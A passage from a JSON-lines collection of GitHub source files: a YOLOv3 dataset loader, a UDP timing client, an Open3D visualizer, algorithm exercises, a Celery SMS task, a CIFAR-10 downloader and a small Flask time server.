# pillow加载图片时默认的数据格式为RGB\n #原始标签信息\n domTree = xml.dom.minidom.parse(antFilePath)\n rootNode = domTree.documentElement\n objectNodes = rootNode.getElementsByTagName(\"object\")\n antInfoList_original = [] # dim2: 0 xmin, 1 ymin, 2 xmax, 3 ymax, 4 name. In original size image.\n for i in objectNodes:\n tl = []\n tl.append(int(float(i.getElementsByTagName(\"bndbox\")[0].getElementsByTagName(\"xmin\")[0].childNodes[0].data)))\n tl.append(int(float(i.getElementsByTagName(\"bndbox\")[0].getElementsByTagName(\"ymin\")[0].childNodes[0].data)))\n tl.append(int(float(i.getElementsByTagName(\"bndbox\")[0].getElementsByTagName(\"xmax\")[0].childNodes[0].data)))\n tl.append(int(float(i.getElementsByTagName(\"bndbox\")[0].getElementsByTagName(\"ymax\")[0].childNodes[0].data)))\n tl.append(i.getElementsByTagName(\"name\")[0].childNodes[0].data)\n antInfoList_original.append(tl)\n\n #缩放后的图片\n resizedImage = None\n if originalImage.width > originalImage.height:\n resizedImage = originalImage.resize((self.yoloImageSize, int(originalImage.height / originalImage.width * self.yoloImageSize)),\n PIL.Image.ANTIALIAS)\n else:\n resizedImage = originalImage.resize((int(originalImage.width / originalImage.height * self.yoloImageSize), self.yoloImageSize),\n PIL.Image.ANTIALIAS)\n xy_factor_0 = resizedImage.width / originalImage.width\n #缩放后的标签信息\n antInfoList_resized = [] # dim2: 0 xmin, 1 ymin, 2 xmax, 3 ymax, 4 name. In resized image.\n for ant in antInfoList_original:\n tl = []\n tl.append(int(ant[0] * xy_factor_0))\n tl.append(int(ant[1] * xy_factor_0))\n tl.append(int(ant[2] * xy_factor_0))\n tl.append(int(ant[3] * xy_factor_0))\n tl.append(ant[4])\n antInfoList_resized.append(tl)\n\n finalImage = PIL.Image.new(\"RGB\", (self.yoloImageSize, self.yoloImageSize), (128, 128, 128))\n antInfoList_final = [] # dim2: 0 xmin, 1 ymin, 2 xmax, 3 ymax, 4 name. In (yoloImageSize x yoloImageSize) Image.\n\n if self.useDataAugmentation:\n StartAugmentation = YOLOv3_DataAugmentations.StartAugmentation()\n EndAugmentation = YOLOv3_DataAugmentations.EndAugmentation()\n RandomBrightness = YOLOv3_DataAugmentations.RandomBrightness(32)\n RandomContrast = YOLOv3_DataAugmentations.RandomContrast(0.5, 1.5)\n RandomSaturation = YOLOv3_DataAugmentations.RandomSaturation(0.5, 1.5)\n RandomHue = YOLOv3_DataAugmentations.RandomHue(9)\n RandomLightingNoise = YOLOv3_DataAugmentations.RandomLightingNoise()\n RandomMirror = YOLOv3_DataAugmentations.RandomMirror()\n RandomResize = YOLOv3_DataAugmentations.RandomResize(0.8, 1.0, 0.8, 1.0, 25)\n\n augImage, antInfoList_aug = StartAugmentation(resizedImage, antInfoList_resized)\n augImage, antInfoList_aug = RandomBrightness(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomContrast(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomSaturation(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomHue(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomLightingNoise(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomMirror(augImage, antInfoList_aug)\n augImage, antInfoList_aug = RandomResize(augImage, antInfoList_aug)\n augImage, antInfoList_aug = EndAugmentation(augImage, antInfoList_aug)\n\n originCoord = (\n random.randint(0, finalImage.width - augImage.width),\n random.randint(0, finalImage.height - augImage.height)\n )\n finalImage.paste(augImage, originCoord)\n for ant in antInfoList_aug:\n tl = []\n tl.append(ant[0] + originCoord[0])\n tl.append(ant[1] + originCoord[1])\n tl.append(ant[2] + originCoord[0])\n tl.append(ant[3] + originCoord[1])\n tl.append(ant[4])\n antInfoList_final.append(tl)\n else:\n originCoord = (\n int((finalImage.width - resizedImage.width) / 2),\n int((finalImage.height - resizedImage.height) / 2)\n )\n finalImage.paste(resizedImage, originCoord)\n for ant in antInfoList_resized:\n tl = []\n tl.append(ant[0] + originCoord[0])\n tl.append(ant[1] + originCoord[1])\n tl.append(ant[2] + originCoord[0])\n tl.append(ant[3] + originCoord[1])\n tl.append(ant[4])\n antInfoList_final.append(tl)\n\n yolov3InfoList = [] # dim2: 0 centerX, 1 centerY, 2 width, 3 height, 4 nameID. In (yoloImageSize x yoloImageSize) Image.\n for ant in antInfoList_final:\n tl = []\n tl.append((ant[0] + ant[2]) / 2)\n tl.append((ant[1] + ant[3]) / 2)\n tl.append(ant[2] - ant[0])\n tl.append(ant[3] - ant[1])\n tl.append(VOCDataset.VOCClassDict_name2num[ant[4]])\n yolov3InfoList.append(tl)\n\n # 初始化labelData_X,每一个预测边界框的标签数据的格式为 s(tx), s(ty), tw, th, s(to), s(tc1), ... , s(tc20)\n # 其中s(x) = sigmoid(x)\n labelData_A = np.zeros((self.yoloImageSize // 32, self.yoloImageSize // 32, 3, 25)).tolist()\n\n labelData_B = np.zeros((self.yoloImageSize // 16, self.yoloImageSize // 16, 3, 25)).tolist()\n\n labelData_C = np.zeros((self.yoloImageSize // 8, self.yoloImageSize // 8, 3, 25)).tolist()\n\n # 初始化labelTag_X\n # 每一个预测边界框的标记默认是”不负责预测真实边界框“。如果在labelTag_X���被特殊标记了,那么: 1 ”忽略“,2 ”负责预测某个真实边界框“\n # 本程序假定每张图最多有100个真实边界框\n labelTag_A = []\n\n labelTag_B = []\n\n labelTag_C = []\n\n for y in yolov3InfoList:\n iouList = []\n anchorIDList = []\n box_t = (0, 0, y[2], y[3])\n for i in range(0, 9):\n box_a = (0, 0, VOCDataset.anchorBox[i // 3][i % 3][0] * self.yoloImageSize, VOCDataset.anchorBox[i // 3][i % 3][1] * self.yoloImageSize)\n iouList.append(self.calculate_iou(box_a, box_t, 0))\n anchorIDList.append(i)\n #冒泡排序\n while True:\n ok = True\n for i in range(0, len(iouList) - 1):\n if iouList[i + 1] > iouList[i]:\n ok = False\n tmp = iouList[i]\n iouList[i] = iouList[i + 1]\n iouList[i + 1] = tmp\n tmp = anchorIDList[i]\n anchorIDList[i] = anchorIDList[i + 1]\n anchorIDList[i + 1] = tmp\n if ok:\n break\n\n for i in range(0, 9):\n anchorID = anchorIDList[i]\n sLabelData_X = labelData_A\n sLabelTag_X = labelTag_A\n if (anchorID // 3) == 0:\n sLabelData_X = labelData_A\n sLabelTag_X = labelTag_A\n elif (anchorID // 3) == 1:\n sLabelData_X = labelData_B\n sLabelTag_X = labelTag_B\n elif (anchorID // 3) == 2:\n sLabelData_X = labelData_C\n sLabelTag_X = labelTag_C\n gridNum = len(sLabelData_X)\n row = int(y[1] / (self.yoloImageSize / gridNum))\n col = int(y[0] / (self.yoloImageSize / gridNum))\n boxID = anchorID % 3\n tag = [row, col, boxID, 2] #”负责预测某个真实边界框“\n if tag not in sLabelTag_X:\n sLabelTag_X.append(tag)\n sLabelData_X[row][col][boxID][0] = y[0] / (self.yoloImageSize / gridNum) - col\n sLabelData_X[row][col][boxID][1] = y[1] / (self.yoloImageSize / gridNum) - row\n sLabelData_X[row][col][boxID][2] = math.log(y[2] / (VOCDataset.anchorBox[anchorID // 3][anchorID % 3][0] * self.yoloImageSize))\n sLabelData_X[row][col][boxID][3] = math.log(y[3] / (VOCDataset.anchorBox[anchorID // 3][anchorID % 3][1] * self.yoloImageSize))\n sLabelData_X[row][col][boxID][4] = 1\n sLabelData_X[row][col][boxID][5 + y[4]] = 1\n break\n\n for i in range(len(labelTag_A), 3 * 100):\n labelTag_A.append([-1, -1, -1, -1])\n for i in range(len(labelTag_B), 3 * 100):\n labelTag_B.append([-1, -1, -1, -1])\n for i in range(len(labelTag_C), 3 * 100):\n labelTag_C.append([-1, -1, -1, -1])\n\n imgTensor = self.transform(finalImage).to(torch.float32)\n\n t_labelData_A = torch.tensor(labelData_A, dtype = torch.float32)\n t_labelData_B = torch.tensor(labelData_B, dtype = torch.float32)\n t_labelData_C = torch.tensor(labelData_C, dtype=torch.float32)\n t_labelTag_A = torch.tensor(labelTag_A, dtype=torch.int16)\n t_labelTag_B = torch.tensor(labelTag_B, dtype=torch.int16)\n t_labelTag_C = torch.tensor(labelTag_C, dtype=torch.int16)\n\n return imgTensor, t_labelData_A, t_labelData_B, t_labelData_C, t_labelTag_A, t_labelTag_B, t_labelTag_C\n\n def __len__(self):\n return len(self.fileNameList)\n\n def calculate_iou(self, box1, box2, format):\n # format: 0, 1。\n # 当format == 0,box1和box2格式应为(center_x, center_y, width, height)\n # 当format == 1,box1和box2的格式应为(x1, y1, x2, y2)\n\n # 计算box1和box2的iou\n if format == 0:\n box1 = (box1[0] - 0.5 * box1[2], box1[1] - 0.5 * box1[3], box1[0] + 0.5 * box1[2], box1[1] + 0.5 * box1[3])\n box2 = (box2[0] - 0.5 * box2[2], box2[1] - 0.5 * box2[3], box2[0] + 0.5 * box2[2], box2[1] + 0.5 * box2[3])\n\n intersect_box = [0., 0., 0., 0.] # box1和box2的交集\n if box1[2] < box2[0] or box1[0] > box2[2] or box1[3] < box2[1] or box1[1] > box2[3]:\n pass\n else:\n intersect_box[0] = max(box1[0], box2[0])\n intersect_box[1] = max(box1[1], box2[1])\n intersect_box[2] = min(box1[2], box2[2])\n intersect_box[3] = min(box1[3], box2[3])\n\n area1 = (box1[2] - box1[0]) * (box1[3] - box1[1]) # box1面积\n area2 = (box2[2] - box2[0]) * (box2[3] - box2[1]) # box2面积\n area_intersect = (intersect_box[2] - intersect_box[0]) * (intersect_box[3] - intersect_box[1]) # 交集面积\n\n if area_intersect > 0:\n return area_intersect / (area1 + area2 - area_intersect) # 计算iou\n else:\n return 0\n\n def drawBBox(self, img, bboxInfo, color):\n \"\"\"\n 参数:\n img: PIL图片对象\n bboxInfo: 边界框信息列表,结构为[[xmin, ymin, xmax, ymax, classname], ...]\n color: 格式为(R, G, B)\n 功能:\n 在图上画出边界框并标注边界框内物体类别名称,用于Debug。\n 该函数会在一个新的PIL图片对象上绘图,不会影响原来的PIL图片对象。\n \"\"\"\n img = img.copy()\n draw = PIL.ImageDraw.Draw(img)\n myFont = PIL.ImageFont.truetype(\"./Fonts/msyhbd.ttc\", 20)\n for b in bboxInfo:\n draw.rectangle(xy=(b[0], b[1], b[2], b[3]), fill=None, outline=color, width=1)\n draw.text(xy=(b[0], b[1] - 20), text=b[4], fill=color, font=myFont)\n return img\n","repo_name":"yangyilin52/YOLOv3-Aluminum-Surface-Defect-Detection","sub_path":"YOLOv3_VOC/YOLOv3_VOCDataset.py","file_name":"YOLOv3_VOCDataset.py","file_ext":"py","file_size_in_byte":14932,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"72866388256","text":"import argparse\nimport socket\nimport threading\nimport time\n\n# This is the file that a real external client will use to send data\n\n# EXAMPLE CALL:\n# python external_send.py --dst_ip 127.0.1.1 --dst_port 8085 --src_ip 127.0.0.1\n\nparser = argparse.ArgumentParser(description='Server')\n# parser.add_argument('--internal_address', type=str, help='Internal mininet address')\nparser.add_argument('--dst_ip', type=str, help='')\nparser.add_argument('--dst_port', type=int, help='')\nparser.add_argument('--src_ip', type=str, help='')\nparser.add_argument('--message', type=str, default=\"hello from rpi!\")\nargs = parser.parse_args()\n\n\n\nLISTEN_SOCKET = None\nSEND_COUNTER = 0\nSEND_TIMES = {}\nSEND_LIMIT = 10\n\ndef listen_thread(cSock, message_str, dst_ip, dst_port):\n\n print(\"Set up listener...hi\")\n \n \n # Time that we wait between replies\n time_diff_wait = 0.5\n\n while True:\n data, address = LISTEN_SOCKET.recvfrom(512)\n # Example address: ('10.0.0.2', 48619)\n # If we receive something\n if len(data):\n message = data.decode()\n print(message)\n\n if \"reply\" in message and len(SEND_TIMES.keys()) < SEND_LIMIT:\n \n \t# Get the message index\n msg_index = int(message.split(\":\")[1])\n \n\t\t# Determine the time difference\n current_time_diff = (time.time() - SEND_TIMES[msg_index])\n current_time_diff = current_time_diff / 2 # Get one-way time\n if current_time_diff > 0: # Just a temp hack\n print(\"Time difference: %f seconds\" % (current_time_diff))\n # last_reply_time = time.time()\n # Once we get a reply, send another message back\n send_message = custom_marshall(message_str)\n clientSocket.sendto(send_message, (dst_ip, dst_port))\n time.sleep(time_diff_wait) # Sleep for 0.5sec\n\n# Form the data to transmit\ndef custom_marshall(message):\n\n global SEND_COUNTER\n\n message_to_send = message #':'.join([destination_id, origin_id, message])\n message_to_send += \":\" + str(SEND_COUNTER)\n SEND_TIMES[SEND_COUNTER] = time.time()\n SEND_COUNTER += 1\n return message_to_send.encode()\n\nif __name__ == '__main__':\n\n # Create socket\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n clientSocket.bind((args.src_ip, args.dst_port))\n # clientSocket.setsockopt(socket.SOL_SOCKET, 25, (\"vclient2-hveth\").encode('utf-8'))\n message = custom_marshall(args.message)\n # message = \"hello mario\".encode()\n\n print(\"Message: \" + message.decode())\n # If this is from a physical node, it can be something like\n clientSocket.sendto(message, \\\n (args.dst_ip, args.dst_port))\n\n print(\"Sent message...\")\n\n # LISTEN_SOCKET = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # LISTEN_SOCKET.bind((args.src_ip, args.dst_port))\n clientSocket.settimeout(10)\n LISTEN_SOCKET = clientSocket\n\n server_listen = threading.Thread(target=listen_thread, \\\n \targs=(clientSocket, args.message, args.dst_ip, args.dst_port))\n server_listen.start()\n","repo_name":"nesl/IoCT-Testbed-Simulation","sub_path":"tests/simple_reply_test/external_send.py","file_name":"external_send.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21546933075","text":"import open3d as o3d\nimport numpy as np \nimport os\nimport copy\nimport time\nimport matplotlib.pyplot as plt\n\ndef create_pcd(xyz, color):\n\t# n x 3\n\tn = xyz.shape[0]\n\tpcd = o3d.geometry.PointCloud()\n\tpcd.points = o3d.utility.Vector3dVector(xyz)\n\tpcd.colors = o3d.utility.Vector3dVector(np.tile(color, (n, 1)))\n\tpcd.estimate_normals(search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))\n\treturn pcd\n\ndef flip_geometries(pcds):\n\tpcds_transform = []\n\tflip_transform = [[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]\n\tfor pcd in pcds:\n\t\tpcd_temp = copy.deepcopy(pcd)\n\t\tpcd_temp.transform(flip_transform)\n\t\tpcds_transform.append(pcd_temp)\n\treturn pcds_transform\n\nclass Visualizer:\n\tdef __init__(self, sleep_time=0.01):\n\t\timport time\n\t\tself.vis = o3d.visualization.Visualizer()\n\t\tself.vis.create_window()\n\t\tself.sleep_time = sleep_time\n\t\tself.counter = 1\n\n\tdef add_geometry(self, pcds):\n\t\tfor pc in pcds: self.vis.add_geometry(pc)\n\n\tdef remove_geometry(self, pcds, reset_bounding_box=False):\n\t\tfor pc in pcds: self.vis.remove_geometry(pc, reset_bounding_box=reset_bounding_box)\n\n\tdef update(self, pcds):\n\t\tfor pc in pcds: self.vis.update_geometry(pc)\n\n\tdef render(self, capture=False):\n\t\tself.set_zoom()\n\t\tself.vis.poll_events()\n\t\tself.vis.update_renderer()\n\t\tif capture: self.capture()\n\t\ttime.sleep(self.sleep_time)\n\n\tdef destroy(self):\n\t\tself.vis.destroy_window()\n\n\tdef set_zoom(self):\n\t\tctr = self.vis.get_view_control()\n\t\tctr.set_zoom(1.1)\n\n\tdef capture(self):\n\t\timage = self.vis.capture_screen_float_buffer(False)\n\t\tplt.imsave(\"images/{:03d}.png\".format(self.counter), np.asarray(image), dpi = 30)\n\t\tself.counter += 1\n\n\tdef rotate_view(self):\n\t\tctr = self.vis.get_view_control()\n\t\tctr.rotate(10.0, -0.0)\n\t\t\n\ndef display_results(template, source, est_T, mask_idx, est_T_series):\n\tnon_mask_idx = np.array([i for i in range(1024) if i not in mask_idx])\n\tunmasked_template = template[non_mask_idx]\n\tmasked_template = template[mask_idx]\n\n\ttransformed_source = np.matmul(est_T[0:3, 0:3], source.T).T + est_T[0:3, 3]\n\t\n\ttemplate_ = create_pcd(template, np.array([1, 0.706, 0]))\n\tsource_ = create_pcd(source, np.array([0, 0.929, 0.651]))\n\ttransformed_source_ = create_pcd(transformed_source, np.array([0, 0.651, 0.921]))\n\tmasked_template_ = create_pcd(masked_template, np.array([1, 0.706, 0]))\n\tunmasked_template_ = create_pcd(unmasked_template, np.array([1,0,0]))\n\n\ttemplate_, source_, transformed_source_, masked_template_, unmasked_template_ = flip_geometries([template_, source_, transformed_source_, masked_template_, unmasked_template_])\n\n\tvis = Visualizer()\n\n\t# Start creating initial_files (Contains template, source, masked_template and result of PointNetLK iterations)\n\tvis.add_geometry([template_, source_])\n\tvis.render(capture=True)\n\n\tvis.remove_geometry([template_])\n\tvis.add_geometry([masked_template_])\n\tvis.render(capture=True)\n\t\n\ttransformed_source = create_pcd(source, np.array([0, 0.651, 0.921]))\n\ttransformed_source = flip_geometries([transformed_source])[0]\n\tvis.add_geometry([transformed_source])\n\tvis.render(capture=True)\n\n\tfor i in range(1, 11):\n\t\test_T = est_T_series[i*4:(i+1)*4, :]\n\t\ttransformed_source_i = np.matmul(est_T[0:3, 0:3], source.T).T + est_T[0:3, 3]\n\t\ttransformed_source_i = create_pcd(transformed_source_i, np.array([0, 0.651, 0.921]))\n\t\ttransformed_source_i = flip_geometries([transformed_source_i])[0]\n\t\ttransformed_source.points = o3d.utility.Vector3dVector(transformed_source_i.points)\n\t\tvis.update([transformed_source])\n\t\tvis.render(capture=True)\n\n\t# Start creating files (Contains rotating view of [template, source and registered point cloud i.e. aligned with temnplate])\n\tvis.remove_geometry([masked_template_])\n\tvis.add_geometry([template_])\n\tvis.render(capture=True)\n\n\tfor i in range(0, 220):\n\t\tvis.rotate_view()\n\t\tvis.render(capture=True)\n\n\tvis.destroy()\n\ndef read_data(path):\n\tdata = np.load(path)\n\ttemplate = data['template']\n\tsource = data['source']\n\test_T_series = data['est_T_series']\n\test_T = data['est_T']\n\tmesh = data['mesh']\n\tmask_idx = data['mask_idx']\n\treturn template, source, est_T, mask_idx, est_T_series\n\n\nif __name__ == '__main__':\n\tpath = '3dmatch_results.npz'\n\ttemplate, source, est_T, mask_idx, est_T_series = read_data(path)\n\n\tif not os.path.exists('images'): os.mkdir('images')\n\tdisplay_results(template, source, est_T, mask_idx, est_T_series)","repo_name":"vinits5/masknet","sub_path":"3dmatch/plot_figures.py","file_name":"plot_figures.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"34"} +{"seq_id":"8107437391","text":"from sys import stdin\nfrom collections import deque\n\n# 2시간 걸렸는데 집중 안한시간 빼면 1시간 40분??\n\nN, M, K = map(int, stdin.readline().split())\nMap = [list(map(int, stdin.readline().split())) for _ in range(N)]\n\ndice = [deque((4, 1, 3, 6)), deque((2, 1, 5, 6))] # [1][0] 서 [2][0] 북 [][1] 윗수 [1][2] 동 [2][2] 남 [][3] -> 아랫수\nmove_ = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n\nd_y, d_x = 0, 0\ndir_ = 0\nSum_ = 0\n\n\ndef move_dice(): # dir 0 ~ 3 -> 동, 남, 서, 북\n global dice, d_y, d_x\n\n if dir_ // 2 == 1:\n dice[dir_ % 2].append(dice[dir_ % 2].popleft())\n\n else:\n dice[dir_ % 2].appendleft(dice[dir_ % 2].pop())\n\n list1, list2 = [], []\n\n for _ in range(4):\n list1.append(dice[1 - dir_ % 2].popleft())\n list2.append(dice[dir_ % 2].popleft())\n\n list1[1], list1[3] = list2[1], list2[3]\n\n for index in range(4):\n dice[1 - dir_ % 2].append(list1[index])\n dice[dir_ % 2].append(list2[index])\n\n d_y, d_x = d_y + move_[dir_][0], d_x + move_[dir_][1]\n add_score()\n\n\ndef add_score():\n global Sum_, dir_\n\n check = [[False for _ in range(M)] for _ in range(N)]\n que = deque()\n que.append([d_y, d_x])\n check[d_y][d_x] = True\n\n base = Map[d_y][d_x]\n count = 1\n while len(que):\n cur_y, cur_x = que.popleft()\n for i in range(4):\n ny, nx = cur_y + move_[i][0], cur_x + move_[i][1]\n if 0 <= ny < N and 0 <= nx < M:\n if check[ny][nx] is False and Map[ny][nx] == Map[cur_y][cur_x]:\n check[ny][nx] = True\n que.append([ny, nx])\n count += 1\n\n Sum_ += base * count\n dice_ = dice[0].pop()\n dice[0].append(dice_)\n\n if dice_ > Map[d_y][d_x]:\n dir_ = (dir_ + 1) % 4\n elif dice_ < Map[d_y][d_x]:\n dir_ = (dir_ + 3) % 4\n\n ny, nx = d_y + move_[dir_][0], d_x + move_[dir_][1]\n if not (0 <= ny < N and 0 <= nx < M):\n dir_ = (dir_ + 2) % 4\n\n\nif __name__==\"__main__\":\n for _ in range(K):\n move_dice()\n\n print(Sum_)\n","repo_name":"jongwook98/algorithm_python","sub_path":"6.연습/주사위굴리기2.py","file_name":"주사위굴리기2.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39474109892","text":"import logging\n\nfrom celery_tasks.main import app\n\nfrom meiduo_mall.libs.yuntongxun.sms import CCP\n\nlogger = logging.getLogger('django')\n\n#验证码短信模板\nSMS_CODE_TEMP_ID = 1\n\n@app.task(name = 'sends_sms_code')\ndef send_sms_code(mobile,code,expires):\n '''\n 发送短信验证码\n :param mobile:手机号\n :param code: 验证码\n :param expires: 有效期\n :return: None\n '''\n logging.info('-----------------------------------')\n logging.info(code)\n logging.info('-----------------------------------')\n try:\n ccp =CCP()\n # result = ccp.send_template_sms(mobile,[code,expires],SMS_CODE_TEMP_ID)\n result = 0\n except Exception as e:\n logger.error(\"发送短信验证码【异常】:%s,message:%s ]\" %(mobile,e))\n\n else:\n if result == 0:\n logger.info(\"发送短信【正常】【mobile:%s]\" % mobile)\n\n else:\n logging.info('-----------------------------------')\n logging.info(code)\n logging.info('-----------------------------------')\n logger.warning('result%s'%result)\n logger.warning(\"发送短信验证码【失败】【mobile:%s ]\" % mobile)\n\n\n\n\n","repo_name":"wangdengkai/meiduo_mall","sub_path":"meiduo_mall/celery_tasks/sms/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8107243711","text":"from sys import stdin\nfrom collections import deque\n\nTest_case = int(stdin.readline().strip())\n\ndx = [1, 2, 2, 1, -1, -2, -2, -1]\ndy = [2, 1, -1, -2, -2, -1, 1, 2]\n\nfor _ in range(Test_case):\n chess_size = int(stdin.readline().strip())\n Que = deque()\n check = [[False] * chess_size for _ in range(chess_size)]\n\n Y, X = map(int, stdin.readline().split())\n Que.append((Y, X))\n check[Y][X] = 0\n\n des_y, des_x = map(int, stdin.readline().split())\n\n while Que:\n cur_y, cur_x = Que.popleft()\n if des_y == cur_y and des_x == cur_x:\n break\n for i in range(len(dx)):\n ny = cur_y + dy[i]\n nx = cur_x + dx[i]\n if 0 <= ny < chess_size and 0 <= nx < chess_size:\n if check[ny][nx] == False:\n Que.append((ny, nx))\n check[ny][nx] = check[cur_y][cur_x] + 1\n\n print(check[cur_y][cur_x])","repo_name":"jongwook98/algorithm_python","sub_path":"5.그래프/나이트의이동.py","file_name":"나이트의이동.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13830428663","text":"# CIFAR10 Downloader\n\nimport logging\nimport pickle\nimport math\nimport os\nimport errno\nimport tarfile\nimport shutil\nimport numpy as np\nimport urllib3\nfrom sklearn.model_selection import train_test_split\nfrom utils.adapt_data import adapt_labels_outlier_task\n\nlogger = logging.getLogger(__name__)\n\ndef get_train(label=-1, centered=True, normalize=True):\n return _get_adapted_dataset(\"train\", label, centered, normalize)\n\ndef get_test(label=-1, centered=True, normalize=True):\n return _get_adapted_dataset(\"test\", label, centered, normalize)\n\ndef get_valid(label=-1, centered=True, normalize=True):\n return _get_adapted_dataset(\"valid\", label, centered, normalize)\n \ndef get_shape_input():\n return (None, 32, 32, 3)\n\ndef get_shape_input_flatten():\n return (None, 32*32*3)\n\ndef get_shape_label():\n return (None,)\n\ndef num_classes():\n return 10\n\ndef get_anomalous_proportion():\n return 0.9\n\ndef _unpickle_file(filename):\n logger.debug(\"Loading pickle file: {}\".format(filename))\n\n with open(filename, mode='rb') as file:\n data = pickle.load(file, encoding='bytes')\n\n # Reorder the data\n img = data[b'data']\n img = img.reshape([-1, 3, 32, 32])\n img = img.transpose([0, 2, 3, 1])\n # Load labels\n lbl = np.array(data[b'labels'])\n\n return img, lbl\n\ndef _get_dataset(split, centered=False, normalize=False):\n '''\n Gets the adapted dataset for the experiments\n Args : \n split (str): train or test\n normalize (bool): (Default=True) normalize data\n centered (bool): (Default=False) data centered to [-1, 1]\n Returns : \n (tuple): images and labels\n '''\n path = \"data\"\n dirname = \"cifar-10-batches-py\"\n data_url = \"http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz\"\n\n if not os.path.exists(os.path.join(path, dirname)):\n # Extract or download data\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n \n file_path = os.path.join(path, data_url.split('/')[-1])\n if not os.path.exists(file_path):\n # Download\n logger.warn(\"Downloading {}\".format(data_url))\n with urllib3.PoolManager().request('GET', data_url, preload_content=False) as r, \\\n open(file_path, 'wb') as w:\n shutil.copyfileobj(r, w)\n\n logger.warn(\"Unpacking {}\".format(file_path))\n # Unpack data\n tarfile.open(name=file_path, mode=\"r:gz\").extractall(path)\n\n # Import the data\n if split == 'test':\n filenames = [\"test_batch\"] \n # elif split == 'valid':\n # filenames = [\"data_batch_5\"]\n else:\n filenames = [\"data_batch_{}\".format(i) for i in range(1, 6)]\n \n imgs = []\n lbls = []\n for f in filenames:\n img, lbl = _unpickle_file(os.path.join(path, dirname, f))\n imgs.append(img)\n lbls.append(lbl)\n\n # Now we flatten the arrays\n imgs = np.concatenate(imgs)\n lbls = np.concatenate(lbls)\n\n # Convert images to [0..1] range\n if normalize:\n imgs = imgs.astype(np.float32)/255.0\n if centered:\n imgs = imgs.astype(np.float32)*2. - 1.\n return imgs.astype(np.float32), lbls\n\ndef _get_adapted_dataset(split, label=None, centered=False, normalize=False):\n \"\"\"\n Gets the adapted dataset for the experiments\n Args : \n split (str): train or test\n mode (str): inlier or outlier\n label (int): int in range 0 to 10, is the class/digit\n which is considered inlier or outlier\n rho (float): proportion of anomalous classes INLIER\n MODE ONLY\n centered (bool): (Default=False) data centered to [-1, 1]\n Returns : \n (tuple): images and labels\n \"\"\"\n dataset = {}\n dataset['x_train'], dataset['y_train'] = _get_dataset('train',\n centered=centered,\n normalize=normalize)\n dataset['x_test'], dataset['y_test'] = _get_dataset('test', centered=centered,\n normalize=normalize)\n\n full_x_data = np.concatenate([dataset['x_train'], dataset['x_test']], axis=0)\n full_y_data = np.concatenate([dataset['y_train'], dataset['y_test']], axis=0)\n \n full_y_data[full_y_data == 10] = 0\n\n dataset['x_train'], dataset['x_test'], \\\n dataset['y_train'], dataset['y_test'] = train_test_split(full_x_data,\n full_y_data,\n test_size=0.2,\n random_state=42)\n \n dataset['x_train'], dataset['x_valid'], \\\n dataset['y_train'], dataset['y_valid'] = train_test_split(dataset['x_train'],\n dataset['y_train'],\n test_size=0.25,\n random_state=42)\n\n\n key_img = 'x_' + split\n key_lbl = 'y_' + split\n\n if label != -1:\n\n if split in ['train', 'valid']:\n\n inliers = dataset[key_img][dataset[key_lbl] == label], \\\n dataset[key_lbl][dataset[key_lbl] == label]\n outliers = dataset[key_img][dataset[key_lbl] != label], \\\n dataset[key_lbl][dataset[key_lbl] != label]\n\n dataset[key_img], dataset[key_lbl] = inliers\n\n dataset[key_lbl] = adapt_labels_outlier_task(dataset[key_lbl],\n label)\n return (dataset[key_img], dataset[key_lbl])\n else:\n dataset[key_lbl] = adapt_labels_outlier_task(dataset[key_lbl],\n label)\n\n return (dataset[key_img], dataset[key_lbl])\n","repo_name":"houssamzenati/Adversarially-Learned-Anomaly-Detection","sub_path":"data/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"34"} +{"seq_id":"25395222729","text":"\"\"\"This is implementation of web server that shows time in Moscow.\"\"\"\nfrom datetime import datetime, timedelta, timezone\nfrom collections import deque\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef time():\n \"\"\"\n Gets current Moscow time and renders html template's\n datetime value\n\n Returns:\n render_template(\"index.html\", datetime) : newly rendered html\n \"\"\"\n timezone_offset = 3.0 # Moscow Standard Time (UTC+03:00)\n tzinfo = timezone(timedelta(hours=timezone_offset))\n cur_time = datetime.now(tzinfo).strftime(\"%H:%M:%S\")\n\n visits = []\n with open(\"visits.txt\", \"r\", encoding=\"utf-8\") as file:\n visits = file.readlines()\n visits = visits[:100]\n visits.insert(0, str(cur_time)+' ')\n with open(\"visits.txt\", \"w\", encoding=\"utf-8\") as file:\n file.writelines(visits)\n \n return render_template(\n \"index.html\", datetime=cur_time\n )\n\n@app.route(\"/visits\")\ndef visits():\n \"\"\"Returns number of times root path was accessed\n\n Returns:\n int: number of times was accessed\n \"\"\"\n visits = []\n with open(\"visits.txt\", \"r\", encoding=\"utf-8\") as file:\n visits = file.readlines()\n\n return str(visits)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", 